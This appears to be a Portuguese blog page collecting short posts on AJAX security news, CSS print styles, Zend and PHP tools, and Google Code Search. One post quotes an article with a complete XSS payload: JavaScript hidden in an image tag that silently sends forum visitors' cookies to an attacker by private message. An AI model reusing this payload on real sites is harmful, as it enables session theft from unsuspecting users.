Uma falha crítica em sistemas web 2.0 permite o roubo de informações dos usuários.

A vulnerabilidade localiza-se no AJAX e existe em três dos principais kits de ferramentas para servidores: ASP.Net AJAX (Atlas), da Microsoft, Google Web Toolkit e xajax, uma implementação AJAX de código aberto baseado em PHP.

Segundo a empresa de segurança Fortify Software, a falha nos kits permite explorar uma brecha conhecida como JavaScript Hijacking. O AJAX, sigla de Asynchronous JavaScript and XML, é uma das bases técnicas para as aplicações de web 2.0.

Na avaliação da Fortify, a origem do problema está em que as aplicações AJAX estão deixando de lado o X, de XML. Assim, a aplicação faz tudo em JavaScript e fica desprotegida.

Fonte: INFO Online 

Por padrão, quando um usuário imprime uma página web que não é projetada com a impressão em mente, a folha de estilo é suprimida e a página é imprimida sem qualquer estilo. Ela tende a parecer uma longa linha de informação iniciando com seu cabeçalho, o conteúdo, uma longa lista de sua barra lateral e então o rodapé.

Para ver a como seu site aparece para a impressão, imprima uma página ou, do menu do seu browser, escolha a Impressão> Pré-visualização. Pouco atraente, não é? E desperdiça bastante papel tendo aquela longa lista da barra lateral dos links do blogroll que imprimem mais de duas páginas.

Para fazer o seu site adequado para imprimir, temos de concentrar-nos na arquitetura do site, a estrutura que mantém o conteúdo dentro de cada seção.

Para entender um pouco mais e continuar a ler esse pequeno tutorial que lhe ajuda a fazer a impressao de suas páginas bem feitas clique aqui.

Fonte: Estilos para Impressao CSS
Tutorial CSS
WikiPediaCSS
CSS Garden
CSS para WebDesign (Maujor)

Estava lendo na Total Security um artigo que mostra como alguém pode roubar cookies usando ajax.

"A grande maioria de ladrões de cookies utiliza métodos de localização em javascript; exemplo window.document.location=http://www.totalsecurity.com.br/ladraodecookie.php. Isso irá redirecionar o internauta para uma página diferente. Agora vamos tentar usar javascript inline, javascript: window.document.location=http://www.sitequequeroredirecionar.com; Essa é a forma mais velha de roubo de cookies. Mas usuários menos bestinhas, até mesmo os bestinhas desconfiarão, pois não estaram no endereço em que iniciaram. Por isso usar AJAX, você poderá roubar cookies de forma silenciosa. Resultado final: pessoas visitam algo como um fórum, até ai tudo bem, do nada a cookie do mesmo é roubada. Nada parece ter acontecido.

Ficou curioso como funciona? Pois bem... imaginemos que estamos em um fórum, que por sua vez tenha uma falha XSS. A missão é infiltrar no fórum, inserir um código javascript(AJAX, é claro) usando a tag para driblar o sistema do fórum. Nesse código, o usuário mandará o cookie dele para você numa mensagem privada, usando o sistema de mensagem do fórum, é claro

*tags modificadas para [] respectivamente.
[img src=javascript:
//Vamos setar XMLHttpRequestObject falso para ver se retornará verdadeiro depois..
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject(Microsoft.XMLHTTP);
}
else
{
alert(Javascript não está ativado.);
}

O código acima é simples, verificará se XMLHttpRequest poderá ser gerado. Se não, uma caixa de alerta será mostrada e o resto do código que será inserido agora, não entrará em funcionamento.

function socket()
{
/*A linha a seguir é muito importante. Se o site está usando POST para enviar as mensagens, então terá de mudar o código usando o seu HTTP debugger. Em SEUNOMEDEUSUÁRIO, você botará seu login no fórum para receber mensagem privada com o cookie da vítima pelo sistema de mensagem privada do fórum*/
XMLHttpRequestObject.open('GET', 'http://www.sitequalquer.com/privatemessage.php user=SEUNOMEDEUSUÁRIO&subject=' + window.document.cookie, true);
XMLHttpRequestObject.setRequestHeader(Content-Type, application/x-www-form-urlencoded);
XMLHttpRequestObject.send(null);
//Out of the Goodness of our heart =p
delete XMLHttpRequestObject;
}
//Não esquecer de fechar a tag, afinal, isso é uma imagem
window.document.onload='socket();']


Esse foi um exemplo claro e bem-sucedido de um código em AJAX para um fórum, em que, quando o post for acessado, o usuário enviará uma mensagem privada com o seu respectivo cookie para quem você desejar."

Fonte: Total Security

Em um forum de discussao um colega abordou a questao de segurança usando PHP nos aplicativos web, em geral e ele menciona que os maiores culpados por invasões entre outros é o programador PHP, nao somente o aplicativo da php.net. Claro tens seus defeitinhos e tals, mas se todos vissem na documentação e conhecesse esses sites que identificam quais versões que tem vulnerabilidades e o que fazer ou melhor nao fazer para que isso prejudique os seus clientes/servidor e tudo envolvido pelo aplicativo.

Bom a integra do artigo pode ser consultado aqui (SecurityFocus).

E para quem quer saber das vulnerabilidades que o PHP ou outro Software tem pode consulta na SecurityFocus que há listas de discução sobre o problema, soluções a tomar, entre outros detalhes.

Dicas sobre segurança para o PHP: Principais falhas de Segurança no PHP, Segurança em código PHP, Enganando o lammer .php -> .aspx

Zend anunciou hoje o lancamento do Zend 5.5 beta mais rápido com as seguintes novidades:

• Novo! Código java completo e configurado para a aplicação
• Novo! Controle do fonte com cores em destaque aperfeiçoado
• Novo! Integração da estrutura Zend e seus componentes
• Novo! Suporte a Remote WSDL File
• Poderoso ambiente de desenvolvimento
• Suporte full ao php 5
• Desenvolvimento e distribuição rápidos do código
• Eliminação dos erros de fontes e de profiles
• Facilidade em conectividade e ferramentas SQL´s
• Ferramentas robustas para o desenvolvimento e testes
• Monitoração da aplicação, incluindo o comportamento do código e seu desempenho

E mais detalhes no site da zend

A Microsoft e a Zend, fornecedora de ferramentas para a criação de software de fonte aberta, anunciaram um acordo de parceria de longo prazo. A negociação se desenvolverá em diversos estágios e tem como premissa garantir que os programas PHP sejam compatíveis com versões passadas e futuras do software Microsoft para servidores de web.

Estava vendo num forum de PHP apareceu a seguinte aplicação, de como recuperar uma imagem de dentro do banco, no exemplo asseguir é recurar do MySQL, e de outros bancos é mto semelhante, farei um teste mais p/ frente em um Oracle, mas por enquanto lá vai o código:


public function resizepics($filename,$newwidth, $newheight){

list($width, $height) = getimagesize($filename);
$thumb = imagecreatetruecolor($newwidth, $newheight);
$source = imagecreatefromjpeg($filename);
imagecopyresized($thumb, $source, 0, 0, 0, 0, $newwidth, $newheight, $width, $height);
imagejpeg($thumb);
}

public function mostraImg($conexao){

$query = mysql_query("SELECT * FROM tabela m",$conexao) or die ("Erro: ". mysql_error());

if($linhas = mysql_num_rows($query)== 1){
$registro = mysql_fetch_array($query);
$filename= $registro['imagem'];
$tempfile = fopen($filename, "w+");
fwrite($tempfile, mysql_result($query, 0, 'imagem'));
fclose($tempfile);
echo $this -> resizepics($filename, '76', '100');
unlink($filename);
} else {
$filename= 'img/NaoDisponivel.jpg';
imagejpeg($this -> LoadJpeg($filename));
}
}

public function LoadJpeg($imgname) {

$im = @imagecreatefromjpeg($imgname); /* Abrindo imagem */
if (!$im) { /* Se correto então gera imagem */
$im = imagecreate(76,100); /* Criando nova imagem*/
$bgc = imagecolorallocate($im, 255, 255, 255);
$tc = imagecolorallocate($im, 0, 0, 0);
imagefilledrectangle($im, 0, 0, 76, 100, $bgc);
/* Erro na geração da imagem */
imagestring($im, 1, 5, 5, "Erro na geração da imagem.".$imgname, $tc);
}
return $im;

}

Fonte: Jáder Tavares (Forum de PHP-pt)

Estava pesquisando e acho que o php roda em ambiente 64 a partir da versão 4.4.4.

Até vou baixar um OS 64bits e testar, claro o mais chato para essas coisas que é o Ruindow$.

O Google anunciou um serviço de buscas para programadores. Trata-se do Google Code Search, um site que simplifica a maneira de procurar por códigos de programação para desenvolvedores, destinados tanto a melhorar software existentes ou criar novos programas.

Segundo Tom Stocky, gerente de produto do Google, o serviço destina-se a ajudar programadores a filtrar os bilhões de linhas das fontes de códigos de computação, ao utilizar sua caixa de buscas familiar para descobrir fragmentos reutilizáveis de software.

O Google está aplicando a mesma técnica que oferece a usuários comuns em busca de textos, imagens e vídeos. Do mesmo modo que um internauta digita algumas palavras na caixa de busca standard do site, os programadores podem procurar por linhas relevantes de códigos no endereço Google : CodeSearch.

Fonte: Redação do Terra